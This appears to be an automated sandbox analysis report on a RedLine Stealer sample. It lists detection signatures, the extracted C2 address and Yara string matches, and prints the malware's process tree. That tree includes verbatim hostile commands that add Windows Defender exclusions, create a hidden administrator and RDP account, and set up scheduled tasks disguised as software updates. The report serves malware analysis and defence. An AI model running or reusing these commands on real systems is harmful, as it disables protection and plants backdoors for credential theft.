Edit tour

Windows Analysis Report
8lOT1rXZp5.exe

Overview

General Information

Sample name:	8lOT1rXZp5.exe renamed because original name is a hash value
Original sample name:	34807a743f2d680eef051852eaef0b16.exe
Analysis ID:	1581194
MD5:	34807a743f2d680eef051852eaef0b16
SHA1:	4e63843e9c51f907952bb2f51d6b3866f81f7bd6
SHA256:	02a193aa0cbdfae2d53e73431501edb4a263c1176ce5cbcb4e03e65a70df29ca
Tags:	exeRedLineStealeruser-abuse_ch
Infos:

Detection

RedLine

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Antivirus detection for dropped file

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

System process connects to network (likely due to code injection or exploit)

Yara detected RedLine Stealer

AI detected suspicious sample

Adds a directory exclusion to Windows Defender

Adds a new user with administrator rights

C2 URLs / IPs found in malware configuration

Contains functionality to register a low level keyboard hook

Drops PE files with a suspicious file extension

Found API chain indicative of sandbox detection

Found many strings related to Crypto-Wallets (likely being stolen)

Hides user accounts

Injects a PE file into a foreign processes

Loading BitLocker PowerShell Module

Modifies Windows Defender protection settings

Obfuscated command line found

Potential malicious VBS script found (has network functionality)

Potential malicious VBS script found (suspicious strings)

Sigma detected: Bad Opsec Defaults Sacrificial Processes With Improper Arguments

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Sigma detected: Script Initiated Connection to Non-Local Network

Sigma detected: Suspicious Add User to Remote Desktop Users Group

Sigma detected: WScript or CScript Dropper

Sigma detected: WScript or CScript Dropper - File

Tries to harvest and steal browser information (history, passwords, etc)

Uses ping.exe to check the status of other devices and networks

Uses ping.exe to sleep

Uses schtasks.exe or at.exe to add and modify task schedules

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Writes to foreign memory regions

Wscript starts Powershell (via cmd or directly)

Yara detected Generic Downloader

Allocates memory with a write watch (potentially for evading sandboxes)

Contains functionality for read data from the clipboard

Contains functionality to block mouse and keyboard input (often used to hinder debugging)

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Contains functionality to communicate with device drivers

Contains functionality to dynamically determine API calls

Contains functionality to execute programs as a different user

Contains functionality to launch a process as a different user

Contains functionality to launch a program with higher privileges

Contains functionality to modify clipboard data

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality to read the clipboard data

Contains functionality to retrieve information about pressed keystrokes

Contains functionality to shutdown / reboot the system

Contains functionality to simulate keystroke presses

Contains functionality to simulate mouse events

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates files inside the system directory

Detected potential crypto function

Dropped file seen in connection with other malware

Drops PE files

Enables debug privileges

Found WSH timer for Javascript or VBS script (likely evasive script)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

OS version to string mapping found (often used in BOTs)

PE file contains an invalid checksum

Potential key logger detected (key state polling based)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: Add User to Local Administrators Group

Sigma detected: New User Created Via Net.EXE

Sigma detected: Powershell Defender Exclusion

Sigma detected: Script Initiated Connection

Sigma detected: Suspicious Schtasks From Env Var Folder

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Uses reg.exe to modify the Windows registry

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

8lOT1rXZp5.exe (PID: 6776 cmdline: "C:\Users\user\Desktop\8lOT1rXZp5.exe" MD5: 34807A743F2D680EEF051852EAEF0B16)

makecab.exe (PID: 5316 cmdline: "C:\Windows\System32\makecab.exe" MD5: 00824484BE0BCE2A430D7F43CD9BABA5)

conhost.exe (PID: 5800 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 4600 cmdline: "C:\Windows\System32\cmd.exe" /c WEHuzypTIfJLQWpZ & HMYPflMZogRtPmKziXCRecxqxWV & rIgSHQwdwGHxUulRaOS & cmd < Adunazione.aiff MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 3612 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 3428 cmdline: cmd MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

findstr.exe (PID: 1740 cmdline: findstr /V /R "^PDJplZmnTgtAyDiuBpyEpVkwfrgXvSPrnafATkwmhgkjZWXWVrVrLcJTaHUuLBwqmqeNgGhdiGdVJYwauseaWLaeJcoksUNMjkNZUpIfQEVtyOpzFBqzmJrNHqrSnwZhSEInkenWINBs$" Raccontero.aiff MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)

Rifiutare.exe.com (PID: 5700 cmdline: Rifiutare.exe.com D MD5: 78BA0653A340BAC5FF152B21A83626CC)

Rifiutare.exe.com (PID: 2896 cmdline: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Rifiutare.exe.com D MD5: 78BA0653A340BAC5FF152B21A83626CC)

RegAsm.exe (PID: 4284 cmdline: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exe MD5: 0D5DF43AF2916F47D00C1573797C1A13)

findstr.exe (PID: 2708 cmdline: findstr /V /R "^PDJplZmnTgtAyDiuBpyEpVkwfrgXvSPrnafATkwmhgkjZWXWVrVrLcJTaHUuLBwqmqeNgGhdiGdVJYwauseaWLaeJcoksUNMjkNZUpIfQEVtyOpzFBqzmJrNHqrSnwZhSEInkenWINBs$" Raccontero.aiff MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)

Uno.exe.com (PID: 5216 cmdline: Uno.exe.com f MD5: 78BA0653A340BAC5FF152B21A83626CC)

Uno.exe.com (PID: 1508 cmdline: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Uno.exe.com f MD5: 78BA0653A340BAC5FF152B21A83626CC)

RegAsm.exe (PID: 3332 cmdline: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exe MD5: 0D5DF43AF2916F47D00C1573797C1A13)

findstr.exe (PID: 6432 cmdline: findstr /V /R "^PDJplZmnTgtAyDiuBpyEpVkwfrgXvSPrnafATkwmhgkjZWXWVrVrLcJTaHUuLBwqmqeNgGhdiGdVJYwauseaWLaeJcoksUNMjkNZUpIfQEVtyOpzFBqzmJrNHqrSnwZhSEInkenWINBs$" Raccontero.aiff MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)

Inebriato.exe.com (PID: 1856 cmdline: Inebriato.exe.com R MD5: 78BA0653A340BAC5FF152B21A83626CC)

Inebriato.exe.com (PID: 5232 cmdline: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Inebriato.exe.com R MD5: 78BA0653A340BAC5FF152B21A83626CC)

RegAsm.exe (PID: 5020 cmdline: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exe MD5: 0D5DF43AF2916F47D00C1573797C1A13)

cmd.exe (PID: 2932 cmdline: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath ""$env:ProgramFiles""" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 1888 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 180 cmdline: powershell -Command Add-MpPreference -ExclusionPath ""$env:ProgramFiles"" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

cmd.exe (PID: 1284 cmdline: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath ""$env:Appdata""" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 4428 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 2248 cmdline: powershell -Command Add-MpPreference -ExclusionPath ""$env:Appdata"" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

cmd.exe (PID: 5272 cmdline: C:\Windows\system32\cmd.exe /c "powershell -Command Set-MpPreference -SubmitSamplesConsent NeverSend" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 4020 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 5324 cmdline: powershell -Command Set-MpPreference -SubmitSamplesConsent NeverSend MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

cmd.exe (PID: 5548 cmdline: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionProcess "C:\Windows\System32\wscript.exe"" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 5408 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 3120 cmdline: powershell -Command Add-MpPreference -ExclusionProcess "C:\Windows\System32\wscript.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

cmd.exe (PID: 5804 cmdline: C:\Windows\system32\cmd.exe /c cscript.exe "C:\Users\user\AppData\Roaming\UeNuQ\1186.vbs" "C:\Users\user\AppData\Roaming\UeNuQ\939.vbs MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 5544 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cscript.exe (PID: 1860 cmdline: cscript.exe "C:\Users\user\AppData\Roaming\UeNuQ\1186.vbs" "C:\Users\user\AppData\Roaming\UeNuQ\939.vbs MD5: CB601B41D4C8074BE8A84AED564A94DC)

cmd.exe (PID: 3760 cmdline: C:\Windows\system32\cmd.exe /c cscript.exe "C:\Users\user\AppData\Roaming\UeNuQ\54.vbs" fsUIwEqMAc zyTFxcsIkA "C:\Users\user\AppData\Roaming\UeNuQ\578.vbs" "C:\Users\user\AppData\Roaming\UeNuQ\BACCrSAh.bat" "C:\Users\user\AppData\Roaming\UeNuQ\RBV.dll" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 5592 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cscript.exe (PID: 6148 cmdline: cscript.exe "C:\Users\user\AppData\Roaming\UeNuQ\54.vbs" fsUIwEqMAc zyTFxcsIkA "C:\Users\user\AppData\Roaming\UeNuQ\578.vbs" "C:\Users\user\AppData\Roaming\UeNuQ\BACCrSAh.bat" "C:\Users\user\AppData\Roaming\UeNuQ\RBV.dll" MD5: CB601B41D4C8074BE8A84AED564A94DC)

cmd.exe (PID: 6256 cmdline: C:\Windows\system32\cmd.exe /c schtasks.exe /Create /XML "C:\Users\user\AppData\Roaming\UeNuQ\RBV.dll" /tn "Adobe Acrobat Update Task53" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 6260 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

schtasks.exe (PID: 6304 cmdline: schtasks.exe /Create /XML "C:\Users\user\AppData\Roaming\UeNuQ\RBV.dll" /tn "Adobe Acrobat Update Task53" MD5: 48C2FE20575769DE916F48EF0676A965)

cmd.exe (PID: 4228 cmdline: C:\Windows\system32\cmd.exe /c cscript.exe "C:\Users\user\AppData\Roaming\UeNuQ\400.vbs" "C:\Users\user\AppData\Roaming\UeNuQ\939.vbs" "C:\Users\user\AppData\Roaming\UeNuQ\RBV.dll" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 7128 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cscript.exe (PID: 6504 cmdline: cscript.exe "C:\Users\user\AppData\Roaming\UeNuQ\400.vbs" "C:\Users\user\AppData\Roaming\UeNuQ\939.vbs" "C:\Users\user\AppData\Roaming\UeNuQ\RBV.dll" MD5: CB601B41D4C8074BE8A84AED564A94DC)

cmd.exe (PID: 6756 cmdline: C:\Windows\system32\cmd.exe /c schtasks.exe /Create /XML "C:\Users\user\AppData\Roaming\UeNuQ\RBV.dll" /tn "CCleaner Update79" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 6800 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

schtasks.exe (PID: 6900 cmdline: schtasks.exe /Create /XML "C:\Users\user\AppData\Roaming\UeNuQ\RBV.dll" /tn "CCleaner Update79" MD5: 48C2FE20575769DE916F48EF0676A965)

cmd.exe (PID: 6988 cmdline: C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Roaming\UeNuQ\UILIklkzCJ.bat fsUIwEqMAc zyTFxcsIkA" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 7012 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 3332 cmdline: C:\Windows\system32\cmd.exe /c "wmic group where sid="S-1-5-32-544" get name /value" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

WMIC.exe (PID: 5344 cmdline: wmic group where sid="S-1-5-32-544" get name /value MD5: E2DE6500DE1148C7F6027AD50AC8B891)

cmd.exe (PID: 3264 cmdline: C:\Windows\system32\cmd.exe /c "wmic group where sid="S-1-5-32-555" get name /value" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

WMIC.exe (PID: 1004 cmdline: wmic group where sid="S-1-5-32-555" get name /value MD5: E2DE6500DE1148C7F6027AD50AC8B891)

net.exe (PID: 3624 cmdline: net user fsUIwEqMAc zyTFxcsIkA /add MD5: 31890A7DE89936F922D44D677F681A7F)

net1.exe (PID: 1016 cmdline: C:\Windows\system32\net1 user fsUIwEqMAc zyTFxcsIkA /add MD5: 2EFE6ED4C294AB8A39EB59C80813FEC1)

net.exe (PID: 4364 cmdline: net localgroup Administrators fsUIwEqMAc /add MD5: 31890A7DE89936F922D44D677F681A7F)

net1.exe (PID: 4412 cmdline: C:\Windows\system32\net1 localgroup Administrators fsUIwEqMAc /add MD5: 2EFE6ED4C294AB8A39EB59C80813FEC1)

net.exe (PID: 1628 cmdline: net localgroup "Remote Desktop Users" fsUIwEqMAc /add MD5: 31890A7DE89936F922D44D677F681A7F)

net1.exe (PID: 5212 cmdline: C:\Windows\system32\net1 localgroup "Remote Desktop Users" fsUIwEqMAc /add MD5: 2EFE6ED4C294AB8A39EB59C80813FEC1)

net.exe (PID: 6760 cmdline: net accounts /maxpwage:unlimited MD5: 31890A7DE89936F922D44D677F681A7F)

net1.exe (PID: 1784 cmdline: C:\Windows\system32\net1 accounts /maxpwage:unlimited MD5: 2EFE6ED4C294AB8A39EB59C80813FEC1)

reg.exe (PID: 3084 cmdline: reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v fsUIwEqMAc /t REG_DWORD /d "00000000" /f MD5: CDD462E86EC0F20DE2A1D781928B1B0C)

PING.EXE (PID: 6740 cmdline: ping 127.0.0.1 -n 30 MD5: B3624DD758CCECF93A1226CEF252CA12)

wscript.exe (PID: 6964 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\AppData\Roaming\UeNuQ\578.vbs" fsUIwEqMAc zyTFxcsIkA "C:\Users\user\AppData\Roaming\UeNuQ\BACCrSAh.bat" MD5: A47CBE969EA935BDD3AB568BB126BC80)

cmd.exe (PID: 3604 cmdline: "C:\Windows\System32\cmd.exe" /C C:\Users\user\AppData\Roaming\UeNuQ\BACCrSAh.bat MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 732 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 2784 cmdline: C:\Windows\system32\cmd.exe /c "wmic group where sid="S-1-5-32-544" get name /value" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

WMIC.exe (PID: 4476 cmdline: wmic group where sid="S-1-5-32-544" get name /value MD5: C37F2F4F4B3CD128BDABCAEB2266A785)

cmd.exe (PID: 1340 cmdline: C:\Windows\system32\cmd.exe /c "wmic group where sid="S-1-5-32-555" get name /value" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

WMIC.exe (PID: 5252 cmdline: wmic group where sid="S-1-5-32-555" get name /value MD5: C37F2F4F4B3CD128BDABCAEB2266A785)

wscript.exe (PID: 6972 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\AppData\Roaming\UeNuQ\939.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)

cmd.exe (PID: 2116 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Program Files\RDP Wrapper\rdpwrap.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 1184 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

fsutil.exe (PID: 3796 cmdline: fsutil dirty query C: MD5: DE00EDA7134D3365E6074700E3008CAD)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
RedLine Stealer	RedLine Stealer is a malware available on underground forums for sale apparently as a standalone ($100/$150 depending on the version) or also on a subscription basis ($100/month). This malware harvests information from browsers such as saved credentials, autocomplete data, and credit card information. A system inventory is also taken when running on a target machine, to include details such as the username, location data, hardware configuration, and information regarding installed security software. More recent versions of RedLine added the ability to steal cryptocurrency. FTP and IM clients are also apparently targeted by this family, and this malware has the ability to upload and download files, execute commands, and periodically send back information about the infected computer.	No Attribution	https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://apophis133.medium.com/redline-technical-analysis-report-5034e16ad152 https://asec.ahnlab.com/en/30445/ https://asec.ahnlab.com/en/35981/ https://asec.ahnlab.com/ko/25837/	https://malpedia.caad.fkie.fraunhofer.de/details/win.redline_stealer

Malware Configuration

Threatname: RedLine

{"C2 url": ["21jhss.club:80"], "Bot Id": "adsbb"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000009.00000003.1972771955.0000000004640000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000009.00000003.1972771955.0000000004640000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
00000009.00000003.1972771955.0000000004640000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_f54632eb	unknown	unknown	0x150c8:$a1: ttp://checkip.amazonaws.com/logins.json 0x14e60:$a2: https://ipinfo.io/ip%appdata%\ 0x153a0:$a3: Software\Valve\SteamLogin Data 0x11458:$a4: get_ScannedWallets 0x102ed:$a5: get_ScanTelegram 0x11073:$a6: get_ScanGeckoBrowsersPaths 0xf03a:$a7: <Processes>k__BackingField 0xd51c:$a8: <GetWindowsVersion>g__HKLM_GetString\|11_0 0xe95b:$a9: <ScanFTP>k__BackingField 0x110fa:$a10: DataManager.Data.Credentials
00000013.00000002.2943468774.0000000000582000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000013.00000002.2943468774.0000000000582000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
00000013.00000002.2943468774.0000000000582000.00000040.00000400.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_f54632eb	unknown	unknown	0x14640:$a1: ttp://checkip.amazonaws.com/logins.json 0x143d8:$a2: https://ipinfo.io/ip%appdata%\ 0x14918:$a3: Software\Valve\SteamLogin Data 0x109d0:$a4: get_ScannedWallets 0xf865:$a5: get_ScanTelegram 0x105eb:$a6: get_ScanGeckoBrowsersPaths 0xe5b2:$a7: <Processes>k__BackingField 0xca94:$a8: <GetWindowsVersion>g__HKLM_GetString\|11_0 0xded3:$a9: <ScanFTP>k__BackingField 0x10672:$a10: DataManager.Data.Credentials
00000009.00000003.1972771955.000000000465A000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000009.00000003.1972771955.000000000465A000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
00000009.00000003.1972771955.000000000465A000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_f54632eb	unknown	unknown	0x150d0:$a1: ttp://checkip.amazonaws.com/logins.json 0x254d8:$a1: ttp://checkip.amazonaws.com/logins.json 0x3b4e0:$a1: ttp://checkip.amazonaws.com/logins.json 0x514e8:$a1: ttp://checkip.amazonaws.com/logins.json 0x674f0:$a1: ttp://checkip.amazonaws.com/logins.json 0x7ff98:$a1: ttp://checkip.amazonaws.com/logins.json 0x94bd8:$a1: ttp://checkip.amazonaws.com/logins.json 0x14e68:$a2: https://ipinfo.io/ip%appdata%\ 0x25270:$a2: https://ipinfo.io/ip%appdata%\ 0x3b278:$a2: https://ipinfo.io/ip%appdata%\ 0x51280:$a2: https://ipinfo.io/ip%appdata%\ 0x67288:$a2: https://ipinfo.io/ip%appdata%\ 0x7fd30:$a2: https://ipinfo.io/ip%appdata%\ 0x94970:$a2: https://ipinfo.io/ip%appdata%\ 0x153a8:$a3: Software\Valve\SteamLogin Data 0x257b0:$a3: Software\Valve\SteamLogin Data 0x3b7b8:$a3: Software\Valve\SteamLogin Data 0x517c0:$a3: Software\Valve\SteamLogin Data 0x677c8:$a3: Software\Valve\SteamLogin Data 0x80270:$a3: Software\Valve\SteamLogin Data 0x94eb0:$a3: Software\Valve\SteamLogin Data
00000009.00000003.1973535617.00000000046BE000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000009.00000003.1973535617.00000000046BE000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
00000009.00000003.1972870705.00000000046C6000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000009.00000003.1972870705.00000000046C6000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
00000009.00000003.1972870705.00000000046C6000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_f54632eb	unknown	unknown	0x13f98:$a1: ttp://checkip.amazonaws.com/logins.json 0x28bd8:$a1: ttp://checkip.amazonaws.com/logins.json 0x13d30:$a2: https://ipinfo.io/ip%appdata%\ 0x28970:$a2: https://ipinfo.io/ip%appdata%\ 0x14270:$a3: Software\Valve\SteamLogin Data 0x28eb0:$a3: Software\Valve\SteamLogin Data 0x10328:$a4: get_ScannedWallets 0x24f68:$a4: get_ScannedWallets 0xf1bd:$a5: get_ScanTelegram 0x23dfd:$a5: get_ScanTelegram 0xff43:$a6: get_ScanGeckoBrowsersPaths 0x24b83:$a6: get_ScanGeckoBrowsersPaths 0xdf0a:$a7: <Processes>k__BackingField 0x22b4a:$a7: <Processes>k__BackingField 0xc3ec:$a8: <GetWindowsVersion>g__HKLM_GetString\|11_0 0x2102c:$a8: <GetWindowsVersion>g__HKLM_GetString\|11_0 0xd82b:$a9: <ScanFTP>k__BackingField 0x2246b:$a9: <ScanFTP>k__BackingField 0xffca:$a10: DataManager.Data.Credentials 0x24c0a:$a10: DataManager.Data.Credentials
Process Memory Space: Rifiutare.exe.com PID: 2896	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: Rifiutare.exe.com PID: 2896	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
Process Memory Space: Rifiutare.exe.com PID: 2896	Windows_Trojan_RedLineStealer_f54632eb	unknown	unknown	0x1c02d:$a4: get_ScannedWallets 0x138863:$a4: get_ScannedWallets 0x503dcb:$a4: get_ScannedWallets 0x5fa2f4:$a4: get_ScannedWallets 0x1af07:$a5: get_ScanTelegram 0x502ca5:$a5: get_ScanTelegram 0x5f91ce:$a5: get_ScanTelegram 0x1bc4d:$a6: get_ScanGeckoBrowsersPaths 0x138483:$a6: get_ScanGeckoBrowsersPaths 0x5039eb:$a6: get_ScanGeckoBrowsersPaths 0x5f9f14:$a6: get_ScanGeckoBrowsersPaths 0x19c96:$a7: <Processes>k__BackingField 0x501a34:$a7: <Processes>k__BackingField 0x5f7f5d:$a7: <Processes>k__BackingField 0x181b4:$a8: <GetWindowsVersion>g__HKLM_GetString\|11_0 0x4fff52:$a8: <GetWindowsVersion>g__HKLM_GetString\|11_0 0x5f647b:$a8: <GetWindowsVersion>g__HKLM_GetString\|11_0 0x195b7:$a9: <ScanFTP>k__BackingField 0x501355:$a9: <ScanFTP>k__BackingField 0x5f787e:$a9: <ScanFTP>k__BackingField 0x1bccf:$a10: DataManager.Data.Credentials
Click to see the 12 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
9.3.Rifiutare.exe.com.4680aa0.0.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
9.3.Rifiutare.exe.com.4680aa0.0.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
9.3.Rifiutare.exe.com.4680aa0.0.unpack	Windows_Trojan_RedLineStealer_f54632eb	unknown	unknown	0x12e40:$a1: ttp://checkip.amazonaws.com/logins.json 0x12bd8:$a2: https://ipinfo.io/ip%appdata%\ 0x13118:$a3: Software\Valve\SteamLogin Data 0xf1d0:$a4: get_ScannedWallets 0xe065:$a5: get_ScanTelegram 0xedeb:$a6: get_ScanGeckoBrowsersPaths 0xcdb2:$a7: <Processes>k__BackingField 0xb294:$a8: <GetWindowsVersion>g__HKLM_GetString\|11_0 0xc6d3:$a9: <ScanFTP>k__BackingField 0xee72:$a10: DataManager.Data.Credentials
9.3.Rifiutare.exe.com.4680aa0.0.unpack	infostealer_win_redline_strings	Finds Redline samples based on characteristic strings	Sekoia.io	0xd6dc:$gen03: get_UserDomainName 0xf719:$gen04: get_encrypted_key 0xf14f:$gen06: GetBrowsers 0xea19:$gen07: get_InstalledInputLanguages 0xc38b:$gen08: BCRYPT_INIT_AUTH_MODE_INFO_VERSION 0x133d0:$spe6: windows-1251, CommandLine: 0x1010a:$spe9: wallet 0xb114:$typ01: 359A00EF6C789FD4C18644F56C5D3F97453FFF20 0xb20f:$typ02: F413CEA9BAA458730567FE47F57CC3C94DDF63C0 0xb51c:$typ03: A937C899247696B6565665BE3BD09607F49A2042 0xb690:$typ05: 4E3D7F188A5F5102BEC5B820632BBAEC26839E63 0xb177:$typ07: 77A9683FAF2EC9EC3DABC09D33C3BD04E8897D60 0xb1c9:$typ08: A8F9B62160DF085B926D5ED70E2B0F6C95A25280 0xb323:$typ10: 2FBDC611D3D91C142C969071EA8A7D3D10FF6301 0xb5ba:$typ12: EB7EF1973CDC295B7B08FE6D82B9ECDAD1106AF2 0xb615:$typ13: 04EC68A0FC7D9B6A255684F330C28A4DCAB91F13
